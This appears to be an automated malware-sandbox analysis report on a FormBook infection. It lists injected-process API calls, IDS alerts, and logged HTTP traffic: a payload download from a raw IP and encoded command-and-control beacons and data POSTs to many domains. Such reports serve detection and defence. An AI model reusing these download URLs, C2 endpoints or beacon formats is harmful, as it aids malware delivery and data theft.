Source: Binary string: wntdll.pdb source: cosses.exe, 00000006.00000003.1469858707.0000000003FA0000.00000004.00001000.00020000.00000000.sdmp, cosses.exe, 00000006.00000003.1470158953.0000000004140000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000007.00000003.1578771387.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1685711194.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1685711194.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1581466750.0000000003400000.00000004.00000020.00020000.00000000.sdmp, calc.exe, calc.exe, 0000000C.00000002.3817940779.000000000540E000.00000040.00001000.00020000.00000000.sdmp, calc.exe, 0000000C.00000003.1684130766.0000000004F0A000.00000004.00000020.00020000.00000000.sdmp, calc.exe, 0000000C.00000002.3817940779.0000000005270000.00000040.00001000.00020000.00000000.sdmp, calc.exe, 0000000C.00000003.1687074462.00000000050BC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: hudFv7yP8kEYIbmJoqYH.exe, 0000000B.00000000.1602639905.000000000052F000.00000002.00000001.01000000.0000000A.sdmp, hudFv7yP8kEYIbmJoqYH.exe, 0000000D.00000000.1753260388.000000000052F000.00000002.00000001.01000000.0000000A.sdmp
Source: C:\Users\user\AppData\Roaming\cosses.exe | Code function: 6_2_0017445A GetFileAttributesW,FindFirstFileW,FindClose, 6_2_0017445A
Source: C:\Users\user\AppData\Roaming\cosses.exe | Code function: 6_2_0017C6D1 FindFirstFileW,FindClose, 6_2_0017C6D1
Source: C:\Users\user\AppData\Roaming\cosses.exe | Code function: 6_2_0017C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 6_2_0017C75C
Source: C:\Users\user\AppData\Roaming\cosses.exe | Code function: 6_2_0017EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 6_2_0017EF95
Source: C:\Users\user\AppData\Roaming\cosses.exe | Code function: 6_2_0017F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 6_2_0017F0F2
Source: C:\Users\user\AppData\Roaming\cosses.exe | Code function: 6_2_0017F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 6_2_0017F3F3
Source: C:\Users\user\AppData\Roaming\cosses.exe | Code function: 6_2_001737EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 6_2_001737EF
Source: C:\Users\user\AppData\Roaming\cosses.exe | Code function: 6_2_00173B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 6_2_00173B12
Source: C:\Users\user\AppData\Roaming\cosses.exe | Code function: 6_2_0017BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 6_2_0017BCBC
Source: C:\Windows\SysWOW64\calc.exe | Code function: 12_2_0324C760 FindFirstFileW,FindNextFileW,FindClose, 12_2_0324C760
Source: C:\Windows\SysWOW64\calc.exe | Code function: 4x nop then xor eax, eax 12_2_03239E30
Source: C:\Windows\SysWOW64\calc.exe | Code function: 4x nop then pop edi 12_2_0323E46D
Source: C:\Windows\SysWOW64\calc.exe | Code function: 4x nop then mov ebx, 00000004h 12_2_050004D8

                  Networking

                  Source: Network traffic | Suricata IDS: 2022050 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 : 172.245.123.24:80 -> 192.168.2.5:49717
                  Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49725 -> 3.33.130.190:80
                  Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49733 -> 13.248.169.48:80
                  Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49737 -> 208.91.197.27:80
                  Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49734 -> 208.91.197.27:80
                  Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49743 -> 13.248.169.48:80
                  Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49736 -> 208.91.197.27:80
                  Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49742 -> 13.248.169.48:80
                  Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49731 -> 13.248.169.48:80
                  Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49744 -> 13.248.169.48:80
                  Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49739 -> 209.74.77.230:80
                  Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49730 -> 13.248.169.48:80
                  Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49741 -> 209.74.77.230:80
                  Source: Network traffic | Suricata IDS: 2022051 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 : 172.245.123.24:80 -> 192.168.2.5:49717
                  Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49740 -> 209.74.77.230:80
                  Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49747 -> 3.33.130.190:80
                  Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49750 -> 13.248.169.48:80
                  Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49735 -> 208.91.197.27:80
                  Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49754 -> 92.204.40.98:80
                  Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49756 -> 92.204.40.98:80
                  Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49755 -> 92.204.40.98:80
                  Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49760 -> 47.83.1.90:80
                  Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49762 -> 13.248.243.5:80
                  Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49758 -> 47.83.1.90:80
                  Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49746 -> 3.33.130.190:80
                  Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49761 -> 47.83.1.90:80
                  Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49763 -> 13.248.243.5:80
                  Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49759 -> 47.83.1.90:80
                  Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49738 -> 209.74.77.230:80
                  Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49748 -> 3.33.130.190:80
                  Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49751 -> 13.248.169.48:80
                  Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49768 -> 13.248.169.48:80
                  Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49769 -> 13.248.169.48:80
                  Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49766 -> 13.248.169.48:80
                  Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49770 -> 162.255.118.68:80
                  Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49764 -> 13.248.243.5:80
                  Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49765 -> 13.248.243.5:80
                  Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49753 -> 13.248.169.48:80
                  Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49752 -> 13.248.169.48:80
                  Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49767 -> 13.248.169.48:80
                  Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49772 -> 162.255.118.68:80
                  Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49757 -> 92.204.40.98:80
                  Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49771 -> 162.255.118.68:80
                  Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49773 -> 162.255.118.68:80
                  Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49775 -> 13.248.169.48:80
                  Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49774 -> 13.248.169.48:80
                  Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49776 -> 13.248.169.48:80
                  Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49779 -> 37.27.60.109:80
                  Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49782 -> 13.248.169.48:80
                  Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49780 -> 37.27.60.109:80
                  Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49778 -> 37.27.60.109:80
                  Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49777 -> 13.248.169.48:80
                  Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49785 -> 13.248.169.48:80
                  Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49783 -> 13.248.169.48:80
                  Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49732 -> 13.248.169.48:80
                  Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49781 -> 37.27.60.109:80
                  Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49749 -> 3.33.130.190:80
                  Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49745 -> 13.248.169.48:80
                  Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49784 -> 13.248.169.48:80
                  Source: DNS query: www.agistaking.xyz
                  Source: DNS query: www.zeniow.xyz
                  Source: DNS query: www.multo.xyz
                  Source: DNS query: www.needethereum.xyz
                  Source: DNS query: www.vaishnavi.xyz
                  Source: DNS query: www.minimalbtc.xyz
                  Source: DNS query: www.hypereth.xyz
                  Source: DNS query: www.teschi.xyz
                  Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Date: Mon, 17 Mar 2025 00:18:57 GMT | Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 | Last-Modified: Thu, 13 Mar 2025 05:24:48 GMT | ETag: "122000-630328a634230" | Accept-Ranges: bytes | Content-Length: 1187840 | Keep-Alive: timeout=5, max=100 | Connection: Keep-Alive | Content-Type: application/x-msdownload
                  Source: Joe Sandbox View | IP Address: 37.27.60.109 37.27.60.109
                  Source: Joe Sandbox View | IP Address: 13.248.169.48 13.248.169.48
                  Source: unknown | TCP traffic detected without corresponding DNS query: 172.245.123.24
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00CB7A18 URLDownloadToFileW,3_2_00CB7A18
                  Source: global traffic | HTTP traffic detected: GET /530/cosses.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: 172.245.123.24 | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /xwqx/?TXWhc2=otmcxnJvFIgVfYDaExj72fsgzBxvuCBK0YH/99vZ/T7EZjaL7WFZt05WCoTvh/+8v51SLvod9F2a5wifQuDxP3nRWm5CoWjn3j0X4DA+L9PYhkGPkNvvOrBLQ+jFA9HM/g==&p29L=vHcD5B0pXdrXi HTTP/1.1 | Host: www.temecula.deals | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.1; KIOSK; Trident/7.0; rv:11.0) like Gecko
                  Source: global traffic | HTTP traffic detected: GET /c8u0/?TXWhc2=FMJVgFO6r2fqsFEm0j1rtldefhT15/tuwnCszuFGPNY4Pf96ze7C0LpVaGXgsqc5GUWtyfXO8eoeNGfDqQZm9XVSjZoRocim5+cyYEf232QE43y67WXakMxM+EQzn5ZSpw==&p29L=vHcD5B0pXdrXi HTTP/1.1 | Host: www.agistaking.xyz | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.1; KIOSK; Trident/7.0; rv:11.0) like Gecko
                  Source: global traffic | HTTP traffic detected: GET /q5nb/?TXWhc2=cbGNT1GwMlz4ZJSwsqDu/1ORw1S0MlT/otaQaC2lDUNXgkD5XcZBKJp94L4r/sunAAfx3aeZsm6/D88jzdrZZsCslV3Pj3aMzOE39ueOny0JikO66JbRLIFRZwNKddc1Fg==&p29L=vHcD5B0pXdrXi HTTP/1.1 | Host: www.anartisthuman.info | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.1; KIOSK; Trident/7.0; rv:11.0) like Gecko
                  Source: global traffic | HTTP traffic detected: GET /ia4f/?TXWhc2=PWKr0tq9ggEA6356SNRFKFD2YrSMupOdL3BBPgf/WfBkZg8pHvuxpJcQ5MLM/zqrzc5BparWtXypfUcbllHuw3zIwhK40dvp2NYqFNTgjY85hcznmwSCz/0CQFdXY6eseA==&p29L=vHcD5B0pXdrXi HTTP/1.1 | Host: www.zeniow.xyz | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.1; KIOSK; Trident/7.0; rv:11.0) like Gecko
                  Source: global traffic | HTTP traffic detected: GET /dlol/?p29L=vHcD5B0pXdrXi&TXWhc2=Vdu1QfmsuFO68GL9XI0ADH8YQzb4ru9/HVgaJhop4EyQK8uQubyUW4cBOiiKJiObJ4wKBbVY5G9jJ/R2VpbOjDiiZcs8A8N/oIAtmGddoH0qVzrdMYyPk1EZp1ADVju6tg== HTTP/1.1 | Host: www.multo.xyz | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.1; KIOSK; Trident/7.0; rv:11.0) like Gecko
                  Source: global traffic | HTTP traffic detected: GET /vhzb/?TXWhc2=utPv65Al4AswLtqjZxeNf4qM07v8dOVJesMXOpbeQKe44HKKs52W877CGyD4DHSN7+a2Yf/CJoqiZidKfHg2tCZ3SpFDxf8il+JJC6T5QpbxCWrjiSbvs+d3MtECq+i4/Q==&p29L=vHcD5B0pXdrXi HTTP/1.1 | Host: www.pond-magic.shop | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.1; KIOSK; Trident/7.0; rv:11.0) like Gecko
                  Source: global traffic | HTTP traffic detected: GET /7t1k/?p29L=vHcD5B0pXdrXi&TXWhc2=FU89ini0gnpj8wdqAhM8o3gy9BaGc+QnDWusiqXcZKGzkaK/1F4vvL3EfhyLSPgSo+LbaTvmAGQC6/BbkgpRX4obn2/g98oV0ZxGp/7ZgtjGqgWCeQhJvzoAMEBdLHiACQ== HTTP/1.1 | Host: www.needethereum.xyz | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.1; KIOSK; Trident/7.0; rv:11.0) like Gecko
                  Source: global traffic | HTTP traffic detected: GET /fepe/?TXWhc2=jiDu0CXVCwpoArsbnTBiSc5Vp6dC42VrzDT1KVnw4j8dDuCAxj6eals1FrYUwp3xSMa6xfrVZjPXN8LVbxOcNTR4KborhVEvwkcAlzsp/e2QBKYFOa5Fjgkm9w8mAaoJRg==&p29L=vHcD5B0pXdrXi HTTP/1.1 | Host: www.vaishnavi.xyz | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.1; KIOSK; Trident/7.0; rv:11.0) like Gecko
                  Source: global traffic | HTTP traffic detected: GET /qk2k/?p29L=vHcD5B0pXdrXi&TXWhc2=zY4n8QAiFtM8TD8bfUkipNK/VFS3sjgA24wL1FxNqii4aPOxIUlgh0bkY4109PjUwHAiRcSBahvbei9zCgo+L9mrYGabDHj2L25JQbHs5NhZbecM8gMHbDZ7BwJZR9YP1w== HTTP/1.1 | Host: www.jplttj.info | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.1; KIOSK; Trident/7.0; rv:11.0) like Gecko
                  Source: global traffic | HTTP traffic detected: GET /tjfr/?TXWhc2=oeA4QLnOH/3WbFs+As0lLrHfo0QAD1+qvIOaenlxWlzTKKLdy4N9FqO9ICkLpn8uqiStNuNSb3U7oeFyCJ1fK4ZPJWuo90S8QUYNRG5R53iu4Doecx08jEfJb6K+pJmUAg==&p29L=vHcD5B0pXdrXi HTTP/1.1 | Host: www.statusq.studio | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.1; KIOSK; Trident/7.0; rv:11.0) like Gecko
                  Source: global traffic | HTTP traffic detected: GET /mtvj/?p29L=vHcD5B0pXdrXi&TXWhc2=tu3KCU12euk3jntJkeXi9h/nPksXdtf9dMqnbhdhpzwTmQJtahFuTjZWW0ZiDwPS2UOKmgPWbSHzrHdc9Mrf36IYg4+TKEAM7FtcI34LKtL9Qpe01/PolI2UXXIc7ljOAg== HTTP/1.1 | Host: www.minimalbtc.xyz | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.1; KIOSK; Trident/7.0; rv:11.0) like Gecko
                  Source: global traffic | HTTP traffic detected: GET /n4wf/?TXWhc2=rVCo5fXTYf5XtykzjIwaPXHBTJgcIT4zvtD+QqvRz6GEPZVd3pXymvzcnaunGoGBfELUwvvDGnhmjqKacrEZK7o+JBLe6VLroN4rOWvbEKd0xSg72XiEpSod6zImVJH1DA==&p29L=vHcD5B0pXdrXi HTTP/1.1 | Host: www.shedsworld.shop | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.1; KIOSK; Trident/7.0; rv:11.0) like Gecko
                  Source: global traffic | HTTP traffic detected: GET /6xo5/?TXWhc2=i9xdm+ALzRl7f5f0DVMmuZlYtUvu1nrJI9ZdcFfBGFNnzYFCdNUFlM+uOZyz474awBsJacKcKaOyZI4sgzqWgNcbHM9Vn8LgakK+EiJeKDGEa/cM10sJ0hSU+wwhNVoF3g==&p29L=vHcD5B0pXdrXi HTTP/1.1 | Host: www.hypereth.xyz | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.1; KIOSK; Trident/7.0; rv:11.0) like Gecko
                  Source: global traffic | HTTP traffic detected: GET /osf3/?TXWhc2=qdQBppsERjq7BhOMv9ZeI+wwS13u4NbXC4cQUFozvYIOjfFpJKWSpe0DgZI9+reaG0YY1Kc/55fF3gopW6qy7/pkGeoiXy+BLij+HyYEeoW4XgISF+PY+R5bB+S+WseGrw==&p29L=vHcD5B0pXdrXi HTTP/1.1 | Host: www.leadmagnetkpis.shop | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.1; KIOSK; Trident/7.0; rv:11.0) like Gecko
                  Source: global traffic | HTTP traffic detected: GET /61ci/?TXWhc2=DoVumyDtGIpodnWKjRpSVFQXCxAAS7tDzHHKO5yQmdRX+9vuh+ww5NbcRHdmyprDf7DdgVkkG+ONLUppnIXBwniQO7iQ6qcK3tRANkFITXHqUS0HOmx0VWUFo9ykoj8KFg==&p29L=vHcD5B0pXdrXi HTTP/1.1 | Host: www.teschi.xyz | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.1; KIOSK; Trident/7.0; rv:11.0) like Gecko
                  Source: global traffic | DNS traffic detected: DNS query: www.temecula.deals
                  Source: global traffic | DNS traffic detected: DNS query: www.agistaking.xyz
                  Source: global traffic | DNS traffic detected: DNS query: www.anartisthuman.info
                  Source: global traffic | DNS traffic detected: DNS query: www.zeniow.xyz
                  Source: global traffic | DNS traffic detected: DNS query: www.multo.xyz
                  Source: global traffic | DNS traffic detected: DNS query: www.pond-magic.shop
                  Source: global traffic | DNS traffic detected: DNS query: www.needethereum.xyz
                  Source: global traffic | DNS traffic detected: DNS query: www.vaishnavi.xyz
                  Source: global traffic | DNS traffic detected: DNS query: www.jplttj.info
                  Source: global traffic | DNS traffic detected: DNS query: www.statusq.studio
                  Source: global traffic | DNS traffic detected: DNS query: www.minimalbtc.xyz
                  Source: global traffic | DNS traffic detected: DNS query: www.shedsworld.shop
                  Source: global traffic | DNS traffic detected: DNS query: www.hypereth.xyz
                  Source: global traffic | DNS traffic detected: DNS query: www.leadmagnetkpis.shop
                  Source: global traffic | DNS traffic detected: DNS query: www.teschi.xyz
                  Source: unknownHTTP traffic detected: POST /c8u0/ HTTP/1.1Host: www.agistaking.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cache-Control: no-cacheContent-Type: application/x-www-form-urlencodedContent-Length: 207Connection: closeOrigin: http://www.agistaking.xyzReferer: http://www.agistaking.xyz/c8u0/User-Agent: Mozilla/5.0 (Windows NT 6.1; KIOSK; Trident/7.0; rv:11.0) like GeckoData Raw: 54 58 57 68 63 32 3d 49 4f 68 31 6a 7a 71 45 6a 6b 48 32 36 31 73 6b 36 31 34 57 77 48 74 65 61 77 44 37 77 4b 67 56 67 48 4f 33 6a 50 30 32 42 75 38 74 4a 49 45 55 76 4f 37 6d 74 76 68 68 55 32 7a 45 6b 37 49 2f 5a 41 62 51 2f 61 58 4f 36 50 68 52 43 55 54 49 70 79 6f 7a 35 6a 55 37 35 4a 5a 38 72 73 36 36 7a 73 49 72 43 67 69 55 31 55 67 66 38 45 61 5a 77 33 76 6e 6e 74 46 62 31 6b 34 33 7a 37 38 6e 34 74 34 38 44 36 4d 67 6d 38 6e 71 79 7a 41 6a 69 59 78 76 53 42 35 4d 31 6f 42 67 2b 68 47 61 4a 6a 54 76 35 45 6d 68 55 6d 36 38 6a 6f 46 67 74 45 78 4f 31 68 76 45 76 68 58 63 4b 43 49 54 34 74 6e 4e 37 6f 59 3d Data Ascii: TXWhc2=IOh1jzqEjkH261sk614WwHteawD7wKgVgHO3jP02Bu8tJIEUvO7mtvhhU2zEk7I/ZAbQ/aXO6PhRCUTIpyoz5jU75JZ8rs66zsIrCgiU1Ugf8EaZw3vnntFb1k43z78n4t48D6Mgm8nqyzAjiYxvSB5M1oBg+hGaJjTv5EmhUm68joFgtExO1hvEvhXcKCIT4tnN7oY=
